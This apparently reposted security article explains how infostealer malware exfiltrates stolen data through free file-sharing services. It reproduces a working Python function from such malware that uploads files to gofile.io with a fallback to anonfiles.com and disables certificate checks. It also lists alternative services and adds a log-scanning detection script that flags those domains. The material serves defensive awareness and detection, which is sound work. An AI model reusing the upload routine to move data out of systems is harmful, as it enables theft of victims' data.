In the digital world, cybercriminals are constantly finding creative ways to circumvent detection and increase the efficiency of their operations. One such method gaining traction is the exploitation of free online services to exfiltrate stolen data. These services, often benign in nature, are being weaponized by attackers to sneak past security defenses. In this article, we explore how attackers are using file-sharing platforms to bypass traditional Command and Control (C2) infrastructures, highlighting specific services being targeted, the ease of abuse, and the emerging alternatives to previously popular services.
Exfiltrating Data Using Free Online Services
Attackers have long understood the advantages of using free online services to exfiltrate data. Rather than setting up complex and costly C2 infrastructures, they take advantage of “official” services, which are often free, widely trusted, and difficult to detect. The real appeal lies in the fact that traffic to these services blends in with normal web traffic, making it much harder to identify as malicious.
One service that was widely abused for this purpose was anonfiles.com, which became notorious for its use in data exfiltration operations. In 2023, it was shut down due to overwhelming abuse. Even so, many malicious scripts still reference this domain, illustrating its lasting impact. Following its closure, alternative platforms quickly emerged to fill the void, with anonfile.la being one such replacement.
Another popular service abused by cybercriminals is gofile.io. This service has been particularly targeted by infostealers, malware designed to extract sensitive information from infected devices. The process of using gofile.io for data exfiltration is relatively simple: attackers request a server from the platform, upload their stolen data, and then receive a link to the uploaded file. In the event that gofile.io fails, malicious scripts often fall back on anonfiles.com, even though the service has been shut down.
Here’s how this simple script works to upload stolen data to gofile.io (the excerpt is reproduced with its quoting restored; `Logger` is the script’s own logging helper, and the imports are the ones the code requires):
```python
import os
import json
from ssl import CERT_NONE
from urllib3 import PoolManager


def UploadToExternalService(self, path, filename=None) -> str | None:
    """Upload the file at `path` to gofile.io and return its download link.
    Falls back to anonfiles.com if gofile.io fails; returns None on failure."""
    if os.path.isfile(path):
        Logger.info("Uploading %s to gofile" % (filename or path))
        with open(path, "rb") as file:
            fileBytes = file.read()
        if filename is None:
            filename = os.path.basename(path)
        # TLS certificate verification is disabled
        http = PoolManager(cert_reqs=CERT_NONE)
        try:
            # Step 1: ask gofile.io which storage server to use
            server = json.loads(http.request("GET", "https://api.gofile.io/getServer").data.decode(errors="ignore"))["data"]["server"]
            if server:
                # Step 2: upload the file and read back the download page link
                url = json.loads(http.request("POST", f"https://{server}.gofile.io/uploadFile", fields={"file": (filename, fileBytes)}).data.decode(errors="ignore"))["data"]["downloadPage"]
                if url:
                    return url
        except Exception:
            try:
                # Fallback: anonfiles.com (shut down in 2023, but still referenced)
                Logger.error("Failed to upload to gofile, trying to upload to anonfiles")
                url = json.loads(http.request("POST", "https://api.anonfiles.com/upload", fields={"file": (filename, fileBytes)}).data.decode(errors="ignore"))["data"]["file"]["url"]["short"]
                return url
            except Exception:
                Logger.error("Failed to upload to anonfiles")
    return None
```
It’s notable that even if uploading to gofile.io fails, the script falls back to anonfiles.com, a service that was previously a popular target but has since been shut down. This shows how easily attackers swap one free service for another as circumstances in the cybercrime landscape change.
Emerging Alternatives and Security Implications
With the shutdown of anonfiles.com, cybercriminals have quickly adapted by turning to other file-sharing platforms. Some of the newer alternatives include:
– transfer.sh
– file.io
– bayfiles.com
– catbox.moe
– filebin.net
– temp.sh
While these services are rarely used for legitimate purposes in corporate environments, they represent a significant threat to organizations that fail to monitor for unusual activity. Tracking the domains and IP addresses associated with these platforms, and in particular outbound POST requests to them, can be a crucial step in identifying and mitigating data exfiltration attempts.
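The following is an added detection example, not code from the article or from any tool it mentions. It scans a constructed, space-separated proxy log (timestamp, client IP, method, host, path, status, bytes sent) for requests to the file-sharing domains named above, matching subdomains such as api.gofile.io and store1.gofile.io while not matching look-alike hosts that merely end in the same letters. Uploads (POST) are rated higher than downloads, and a large POST body is rated highest, which is the shape the exfiltration script above produces: a GET to fetch a server, then a POST to upload the archive. The log layout, the sample lines, and the 1 MB upload threshold are assumptions for the example.

```python
"""Flag outbound requests to free file-sharing services in a proxy log."""
import re
from dataclasses import dataclass

# Domains named in the article. A host matches if it equals the domain or
# ends in "." + domain (api.gofile.io matches; profile.io does not match file.io).
FILE_SHARING_DOMAINS = {
    "gofile.io", "anonfiles.com", "anonfile.la", "transfer.sh", "file.io",
    "bayfiles.com", "catbox.moe", "filebin.net", "temp.sh",
}

# Constructed sample log (assumed layout):
# timestamp client_ip method host path status bytes_sent
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.12 GET www.example.com /index.html 200 512
2024-05-01T10:00:05Z 10.0.0.12 GET api.gofile.io /getServer 200 210
2024-05-01T10:00:07Z 10.0.0.12 POST store1.gofile.io /uploadFile 200 5242880
2024-05-01T10:00:09Z 10.0.0.34 GET profile.io /login 200 1024
2024-05-01T10:01:15Z 10.0.0.12 POST api.anonfiles.com /upload 000 0
2024-05-01T10:02:00Z 10.0.0.55 GET catbox.moe /c/abcd.zip 200 4096
"""

LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\d+) (\d+)$")


@dataclass
class Event:
    ts: str
    client: str
    method: str
    host: str
    path: str
    status: int
    bytes_sent: int


def parse_line(line: str):
    """Parse one log line into an Event, or return None if it is malformed."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    ts, client, method, host, path, status, sent = m.groups()
    return Event(ts, client, method.upper(), host.lower().rstrip("."), path,
                 int(status), int(sent))


def matched_service(host: str):
    """Return the watched domain that `host` belongs to, or None."""
    host = host.lower().rstrip(".")
    for domain in FILE_SHARING_DOMAINS:
        if host == domain or host.endswith("." + domain):
            return domain
    return None


def classify(event: Event, upload_threshold: int = 1_000_000):
    """Severity for a watched-domain event: high for a large POST (likely an
    upload of collected data), medium for any other POST, low for reads."""
    service = matched_service(event.host)
    if service is None:
        return None
    if event.method == "POST" and event.bytes_sent >= upload_threshold:
        severity = "high"
    elif event.method == "POST":
        severity = "medium"
    else:
        severity = "low"
    return severity, service


def scan_log(text: str, upload_threshold: int = 1_000_000):
    """Return one alert dict per request that touches a watched domain."""
    alerts = []
    for line in text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        hit = classify(ev, upload_threshold)
        if hit is None:
            continue
        severity, service = hit
        alerts.append({"ts": ev.ts, "client": ev.client, "host": ev.host,
                       "method": ev.method, "bytes": ev.bytes_sent,
                       "service": service, "severity": severity})
    return alerts


def clients_by_service(alerts):
    """Map each client IP to the sorted list of watched services it contacted;
    a client touching several services in turn mirrors the script's fallback."""
    seen = {}
    for a in alerts:
        seen.setdefault(a["client"], set()).add(a["service"])
    return {client: sorted(s) for client, s in seen.items()}


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a['severity']:6} {a['ts']} {a['client']} {a['method']} "
              f"{a['host']} ({a['bytes']} bytes)")
    print(clients_by_service(scan_log(SAMPLE_LOG)))
```

Run against the sample, the script flags the two gofile.io requests, the failed anonfiles.com POST and the catbox.moe download, while www.example.com and the look-alike profile.io produce nothing. In practice the domain set would be maintained as a threat-intelligence feed and the per-client grouping fed into a SIEM rule, since a single client hitting two of these services within seconds is exactly the fallback pattern the article’s script exhibits.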
What Undercode Say:
The abuse of free file-sharing services by cybercriminals is a growing concern that many security professionals are only just beginning to address. The ease with which attackers can bypass traditional security measures, such as C2 infrastructures and advanced malware detection systems, is troubling. The fact that these services are “official” and seemingly legitimate makes it more difficult for traditional security solutions to flag malicious activity.
One of the most concerning aspects is the sheer number of alternative services now available for data exfiltration. With new platforms appearing rapidly, defenders face the constant challenge of keeping up with the ever-changing landscape of cybercrime. It’s not enough to simply blacklist known malicious sites; defenders must adopt more proactive strategies, including network traffic analysis and domain reputation monitoring, to spot signs of abuse.
Another point of concern is the increasing sophistication of malicious scripts. As shown in the Python code above, attackers are utilizing well-established, automated procedures to upload and distribute stolen data. The built-in fallback to an alternative service demonstrates a high level of adaptability and persistence. These scripts are designed to maximize the chances of a successful exfiltration, even when certain services are taken offline or blocked.
Furthermore, the integration of these services with existing malware strains like infostealers adds an additional layer of complexity to the threat. It’s not just about the stolen data anymore; it’s about the speed and efficiency with which it can be moved across borders and distributed. This type of rapid, low-cost data exfiltration is difficult for traditional security measures to intercept, especially in real-time.
Fact Checker Results:
- The shutdown of anonfiles.com due to abuse in 2023 is accurate, as reported by sources like BleepingComputer.
- The script example provided is consistent with common tactics used in cybercrime, with real-world applications of similar scripts found in infostealer malware.
- The alternative services listed are indeed active and have been associated with various abuse cases, further emphasizing the need for vigilance in monitoring these domains.
References:
Reported By: isc.sans.edu